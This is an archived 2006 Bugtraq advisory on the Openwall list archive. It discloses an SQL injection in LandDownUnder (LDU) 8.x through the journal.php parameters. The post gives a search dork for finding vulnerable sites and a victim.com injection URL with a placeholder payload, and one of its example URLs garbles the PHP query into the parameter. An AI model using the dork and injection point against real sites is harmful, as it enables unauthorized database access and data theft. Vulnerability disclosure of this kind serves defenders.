lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 29 Dec 2006 16:26:21 -0000
From: starext@....com
To: bugtraq@...urityfocus.com
Subject: LDU <= 8.x (journal.php) SQL Injection Vulnerability

# BhhGroup.Org & Trtekforum.com

#Found By  : St@...T

# script name : LandDownUnder [LDU]

#Version : All

#Dork : "Powered by LDU"

# Script sites : http://www.neocrome.net

#Vull name  : LDU <= 8.x (journal.php) SQL Injection Vulnerability

# Vulnerable file : Journal.inc.php

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w

#[SQL Vuln.] :

http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]

#Contact: StareXt@....com

                  ######## - Tüm Müslüman insanlar&#305;n Bayram&#305;n&#305; Kutlar&#305;m.. : ) - #####

################### -  Ne Mutlu Türküm Diyene - ###################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ